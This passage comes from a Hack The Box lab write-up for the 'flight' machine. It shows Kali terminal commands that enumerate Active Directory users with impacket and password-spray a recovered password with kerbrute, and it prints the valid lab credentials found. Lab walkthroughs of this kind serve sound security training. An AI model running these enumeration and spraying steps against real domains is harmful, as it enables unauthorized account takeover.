Password Reuse
Testing the password of the svc_apache account for password reuse
┌──(kali㉿kali)-[~/archive/htb/labs/flight]
└─$ KRB5CCNAME=svc_apache@g0.flight.htb.ccache impacket-GetADUsers flight.htb/svc_apache -no-pass -k -all -dc-ip $IP | cut -d ' ' -f1
[...REDACTED...]
Administrator
Guest
krbtgt
S.Moon
R.Cold
G.Lors
L.Kein
M.Gold
C.Bum
W.Walker
I.Francis
D.Truff
V.Stevens
svc_apache
O.PossumI will first grab all the domain users and save them into a file
┌──(kali㉿kali)-[~/archive/htb/labs/flight]
└─$ kerbrute passwordspray --dc g0.flight.htb -d FLIGHT.HTB ./users.txt 'S@Ss!K@*t13'
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
version: v1.0.3 (9dad6e1) - 12/11/23 - Ronnie Flathers @ropnop
2023/12/11 22:25:03 > Using KDC(s):
2023/12/11 22:25:03 > g0.flight.htb:88
2023/12/11 22:25:03 > [+] VALID LOGIN: S.Moon@FLIGHT.HTB:S@Ss!K@*t13
2023/12/11 22:25:04 > [+] VALID LOGIN: svc_apache@FLIGHT.HTB:S@Ss!K@*t13
2023/12/11 22:25:04 > Done! Tested 15 logins (2 successes) in 0.977 secondsPassword reuse confirmed
svc_apache account and S.Moon user share the same password; S@Ss!K@*t13
I will validate this again and request the KDC for a TGT